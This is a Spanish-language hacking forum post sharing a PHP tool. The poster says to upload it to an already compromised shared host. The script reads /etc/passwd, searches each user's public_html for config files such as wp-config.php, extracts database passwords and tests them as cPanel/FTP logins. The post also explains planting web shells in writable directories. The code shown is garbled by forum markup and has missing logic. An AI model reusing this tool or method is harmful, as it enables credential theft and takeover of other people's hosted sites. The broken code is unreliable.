buenas, aquí le dejo esta herramienta muy util para sacar muchos hackedhost en mis tiempo era una tool private del foto
[email protected] 
a según ese foro lo defaceraon y por ahí subieron todas las tool private (googleen xD)
solo necesitas subirla algún hackedhost y ejecutarlo.. el sistema empezara a buscar las clave de cpanel del host ademas también publica directorio "bypasseable" es decir si en ese host hay varias pagina alojada te da el directorio de dicha web por ejemplo "home/$underc0de/public_html/" entonces por medio de shell entramos en ese directorio.. En caso que tengamos permisos de escritura podemos subir shell por ahí en caso que no entonces hay que revisar que cms usa editar el config.php y subir la shell
espero que aun funcione.. esta herramienta me fue muy útil
<?php
echo "<html>";
echo "<title>[email protected]</title><body>";
##################
@$passwd=fopen('/etc/passwd','r'); if (!$passwd) {
echo "[-] Error : coudn't read /etc/passwd";
}
$i=0;
if ($i>35) {
$username=substr($str,0,$pos); $dirz="/home/$username/public_html/";
if (($username!="")) {
}
}
}
$i++;
}
###################
#########################
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";
echo "<ul class="bbc_list
"><li type="square
"> Founded ".sizeof($users)." entrys in /etc/passwd\n";[/li
][/list] echo "</li><li type="square
"> Founded ".sizeof($path_to_public)." readable public_html directories\n";[/li
][/list]
echo "[~] Searching for passwords in config.* files...\n\n";
foreach ($users as $user) {
$path="/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n</li><li type="square
"> Done\n";[/li
][/list]
function read_dir($path,$username) {
while (false !== ($file = readdir($handle))) { $fpath="$path$file";
if (($file!='.') and ($file!='..')) {
$dr="$fpath/";
read_dir($dr,$username);
}
else {
if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) {
$pass=get_pass($fpath);
if ($pass!='') {
echo "</li><li type="square
"> $fpath\n$pass\n";[/li
][/list] ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link) {
@$config=fopen($link,'r'); else
return $pass;
}
}
}
function ftp_check($login,$pass) {
if ($ftp) {
if ($res) {
echo '[Cpanel Found !!!] '.$login.':'.$pass." Success\n";
}
}
}
echo "</textarea><br>";
echo "</body></html>";
?>
Similar topics (5)
Septiembre 06, 2012, 03:26:16 pm